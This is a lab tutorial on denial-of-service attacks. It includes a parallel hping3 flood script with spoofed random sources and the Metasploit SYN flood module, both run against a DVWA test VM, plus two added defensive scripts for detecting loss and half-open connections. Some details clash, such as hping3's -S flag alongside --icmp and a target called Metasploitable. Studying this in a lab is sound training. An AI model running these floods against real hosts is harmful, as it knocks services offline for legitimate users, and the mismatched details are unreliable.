What is a DoS Attack and why should you worry?
A Denial of Service (DoS) attack is a malicious effort to disrupt the functioning of a system or service by overwhelming it with traffic.
Imagine being at a cafe with a friend, trying to have a conversation when all of a sudden, a group of people come in and start shouting. You can’t even hear each other, so you have no choice but to stop talking to your friend because the noise becomes too much. That’s what happens during DoS attacks.
These attacks take advantage of network resource limits to exhaust bandwidth, CPU, and memory, which makes the service unavailable to legitimate users. The primary goal is to deny legitimate users access to the resource by interrupting or suspending services, either temporarily or indefinitely.
The impact on businesses and individuals varies depending on the duration and intensity:
- Downtime: This is the most immediate consequence that occurs. For businesses this means loss of revenue especially for e-commerce sites, online platforms, and services that rely on online transactions.
- Financial Loss: Beyond just lost sales, businesses may incur additional costs related to mitigation efforts, increased cybersecurity measures, legal fees, and possibly paying ransoms if the DoS attack escalates into ransomware threats.
- Damage to Reputation: Repeated attacks can damage your company's reputation leading to loss of trust among users and customers which has long term consequences on customer loyalty and brand perception.
- Operational Disruption: DoS attacks can mess up everyday operations for both individuals and organizations by disrupting communication and access to critical online services.
- Resource Diversion: Responding to and recovering from these types of attacks can divert resources from other important projects, affecting overall productivity.
Performing DoS Attack Using hping3
We will use Kali Linux as our attack platform and perform the attack on DVWA, a web application specifically designed to be vulnerable for educational purposes. We already installed these VMs as explained in a separate article, Setup Lab Environment for CompTIA PenTest+ Exam (PT0-002).
Open a terminal on Kali Linux and perform a continuous ping towards your DVWA web server:
ping 10.10.1.12
In a different terminal we will use hping3 to initiate a flood of requests towards the target host. For example:
hping3 -S --flood --rand-source --icmp <TARGET IP>
- hping3: Invokes the hping3 tool, used for crafting and sending custom TCP/IP packets.
- -S: Specifies the TCP SYN flag, indicating a connection initiation.
- --flood: Floods the target with packets at maximum speed.
- --rand-source: Uses random source IP addresses for each packet, making the traffic harder to trace.
- --icmp: Selects ICMP mode, so the packets sent are ICMP echo requests.
- <TARGET IP>: Represents the IP address of the target to receive the flood of ICMP packets.
Running a single instance of this command may not be sufficient to see any noticeable difference, so we will create a shell script to send parallel requests to our target host:
#!/bin/bash
# Usage: ./trigger_flood.sh <target_ip> <number_of_executions>
TARGET_IP=$1
NUM_EXECUTIONS=$2
if [[ $# -lt 2 ]]; then
    echo "Usage: $0 <target_ip> <number_of_executions>"
    exit 1
fi
# Function to kill all child processes upon exit
function cleanup {
    echo "Killing all hping3 processes..."
    kill $(jobs -p)
    exit
}
# Trap SIGINT (Ctrl+C) and SIGTERM signals to execute the cleanup function
trap cleanup SIGINT SIGTERM
# Execute hping3 in parallel
for ((i=1; i<=NUM_EXECUTIONS; i++))
do
    hping3 -S --flood --rand-source --icmp "$TARGET_IP" > /dev/null 2>&1 &
done
# Wait for all child processes to finish
wait
Let's run 300 instances of the flood command against our target host:
bash trigger_flood.sh 10.10.1.12 300
We can now see the impact of this command on the ping output:
The increasing round trip time (RTT) for some packets, peaking at 1370 ms, could suggest that the target VM is under some level of stress, possibly from processing the incoming pings or other operations. We could also see periods when there was no response at all from the target host.
The web application is also no longer accessible from the browser:
This shows the kind of impact such DoS attacks can have: we didn't even target the port number used by the DVWA web server, yet just sending ICMP packets brought down the web server.
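The ping observation above can be turned into a repeatable health check. The following is an added example, not code from the original article: it summarises ping replies into received, lost and slow counts, using constructed sample output and an assumed 500 ms RTT threshold.

```shell
#!/bin/sh
# Added example: summarise ping replies to spot loss and latency spikes.

# Constructed sample of ping output during a flood (not captured from the lab).
sample_ping() {
    cat <<'EOF'
PING 10.10.1.12 (10.10.1.12) 56(84) bytes of data.
64 bytes from 10.10.1.12: icmp_seq=1 ttl=64 time=0.512 ms
64 bytes from 10.10.1.12: icmp_seq=2 ttl=64 time=0.498 ms
64 bytes from 10.10.1.12: icmp_seq=3 ttl=64 time=845 ms
64 bytes from 10.10.1.12: icmp_seq=6 ttl=64 time=1370 ms
64 bytes from 10.10.1.12: icmp_seq=7 ttl=64 time=1.20 ms
EOF
}

# ping_health <rtt_limit_ms>: reads ping output on stdin.
# Loss is inferred from gaps in icmp_seq between the first and last reply,
# so requests still unanswered after the last reply are not counted.
ping_health() {
    awk -v limit="$1" '
        /icmp_seq=/ && /time=/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^icmp_seq=/) seq = substr($i, 10) + 0
                if ($i ~ /^time=/)     rtt = substr($i, 6) + 0
            }
            if (n == 0) first = seq
            last = seq; n++
            if (rtt > max) max = rtt
            if (rtt > limit) slow++        # reply arrived, but too late
        }
        END {
            if (n == 0) { print "received=0 status=NO_REPLIES"; exit }
            lost = (last - first + 1) - n
            status = (lost > 0 || slow > 0) ? "DEGRADED" : "OK"
            printf "received=%d lost=%d slow=%d max_rtt_ms=%.1f status=%s\n",
                   n, lost, slow, max, status
        }'
}

sample_ping | ping_health 500
```

Against the live lab, pipe the running ping into it with a fixed count, for example `ping -c 30 10.10.1.12 | ping_health 500`.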
Performing DoS Attack Using Metasploit
We already covered how to use Metasploit to perform exploits in our previous article, Exploit Vulnerabilities using Metasploit. We will again use Metasploit to perform a DoS attack on our DVWA web server.
Open a terminal and start a ping towards your target host. We will use this data to determine the impact of the DoS attack by Metasploit:
ping 10.10.1.12
Open another terminal on your Kali Linux VM and launch the Metasploit console by typing msfconsole. Use the search command to find DoS-related modules:
search dos tcp
Once you find a suitable module, use the use command to select it. For example, use auxiliary/dos/tcp/synflood:
msf6 > use auxiliary/dos/tcp/synflood
msf6 auxiliary(dos/tcp/synflood) >
Use the show options command to view the required parameters for the selected module:
msf6 auxiliary(dos/tcp/synflood) > show options
Module options (auxiliary/dos/tcp/synflood):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   NUM                         no        Number of SYNs to send (else unlimited)
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port
   SHOST                       no        The spoofable source address (else randomizes)
   SNAPLEN    65535            yes       The number of bytes to capture
   SPORT                       no        The source port (else randomizes)
   TIMEOUT    500              yes       The number of seconds to wait for new data
Set the target IP address using the set RHOSTS command. You can also choose to set other options based on your environment:
msf6 auxiliary(dos/tcp/synflood) > set RHOSTS 10.10.1.12
RHOSTS => 10.10.1.12
Once all options are configured, you can run the exploit:
msf6 auxiliary(dos/tcp/synflood) > exploit
[*] Running module against 10.10.1.12
In a different terminal you can observe changes in the ping output. In our case we observed packet drops at frequent intervals while the exploit was running. We can see the packet loss summary after stopping the ping command:
The exploit initiates a SYN flood attack on the target system, Metasploitable. By flooding it with a massive number of SYN packets, the attacker aims to overload its network stack and resources. The resulting congestion leaves the target unable to handle incoming connections and causes packet loss, a state where genuine packets like ICMP Echo Requests (commonly used in ping tests) are discarded by the target. This high level of packet loss may disrupt network services, with a significant percentage of such packets being dropped.
You can press Ctrl+C to stop the exploit execution:
[*] SYN flooding 10.10.1.12:80...
^C[-] Stopping running against current target...
[*] Control-C again to force quit all targets.
[*] Auxiliary module execution completed
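On the target side, the SYN flood described above shows up as a pile-up of half-open (SYN-RECV) connections on the attacked port. The following is an added example, not code from the original article or from Metasploit: it counts half-open sockets per listening port from `ss -tan` output, using constructed sample data, a hypothetical client address 10.10.1.10 and an assumed threshold of 5.

```shell
#!/bin/sh
# Added example: flag listening ports with a pile-up of half-open connections.

# Constructed sample of `ss -tan` output on the target; peer addresses are
# taken from documentation ranges, not from the lab.
sample_ss() {
    cat <<'EOF'
State     Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN    0      128    0.0.0.0:80          0.0.0.0:*
LISTEN    0      128    0.0.0.0:22          0.0.0.0:*
ESTAB     0      0      10.10.1.12:80       10.10.1.10:51514
SYN-RECV  0      0      10.10.1.12:80       198.51.100.7:1025
SYN-RECV  0      0      10.10.1.12:80       203.0.113.44:40211
SYN-RECV  0      0      10.10.1.12:80       192.0.2.19:3321
SYN-RECV  0      0      10.10.1.12:80       198.51.100.201:60000
SYN-RECV  0      0      10.10.1.12:80       203.0.113.5:2048
SYN-RECV  0      0      10.10.1.12:80       192.0.2.77:17
SYN-RECV  0      0      10.10.1.12:22       10.10.1.10:40022
EOF
}

# syn_flood_check <limit>: reads `ss -tan` output on stdin.
# Randomised source addresses put each half-open socket behind a different
# peer, so the count is kept per local port rather than per source.
syn_flood_check() {
    awk -v limit="$1" '
        $1 == "SYN-RECV" {
            n = split($4, l, ":"); port = l[n]       # local port
            peer = $5; sub(/:[0-9]+$/, "", peer)     # peer address without port
            half[port]++
            if (!((port, peer) in seen)) { seen[port, peer] = 1; peers[port]++ }
        }
        END {
            for (p in half)
                if (half[p] >= limit) {
                    printf "port=%s half_open=%d distinct_peers=%d status=SUSPECT\n",
                           p, half[p], peers[p]
                    flagged = 1
                }
            if (!flagged) print "status=OK"
        }'
}

sample_ss | syn_flood_check 5
```

On the target, run `ss -tan | syn_flood_check 5` while the test is in progress. `sysctl net.ipv4.tcp_syncookies` shows whether SYN cookies, the Linux kernel's defence against a full SYN backlog, are enabled.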
Summary
This article is a complete look at Denial of Service (DoS) attacks. They are made to disrupt services and render them useless to the people who should actually be using them. It provides insight into different types of DoS attacks, from volumetric to protocol and application layer attacks. These each have their own unique traits, but all are very dangerous to businesses and individuals. Using Kali Linux, Metasploitable, and DVWA as examples, we have tried to show how these things work in practice so you can see how important cybersecurity measures are in protecting against these threats. The world we live in is becoming more interconnected every day, which means there's a lot more risk. Understanding DoS attacks will let companies bolster their defenses and safeguard against threats like this one.